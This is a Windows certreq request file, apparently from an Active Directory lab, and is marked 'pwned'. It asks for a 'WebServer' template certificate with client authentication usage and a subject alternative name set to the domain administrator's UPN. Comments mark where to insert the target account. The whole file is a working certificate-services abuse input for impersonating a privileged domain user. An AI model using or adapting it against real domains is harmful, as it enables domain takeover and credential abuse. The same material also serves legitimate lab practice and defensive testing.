[Version]
Signature="$Windows NT$"

[NewRequest]
Subject = "CN=administrator, CN=Users, DC=queen, DC=indishell, DC=lab" ;Full DN of the target Domain user account goes here
MachineKeySet = FALSE
KeyLength = 2048
KeySpec=1
Exportable = TRUE
RequestType = PKCS10
ProviderName = "Microsoft Enhanced Cryptographic Provider v1.0"
FriendlyName = "pwned"

[ApplicationPolicyStatementExtension]
Policies =  AppAuthPolicy
CRITICAL = TRUE

[AppAuthPolicy]
OID=1.3.6.1.5.5.7.3.2 ; Client Authentication

[EnhancedKeyUsageExtension]
OID=1.3.6.1.5.5.7.3.1 ; Server Authentication
OID=1.3.6.1.5.5.7.3.2 ; Client Authentication

[Extensions]
2.5.29.17 = "{text}"
_continue_ = "UPN=administrator" ; User principal name goes here

[RequestAttributes]
CertificateTemplate = "WebServer" 
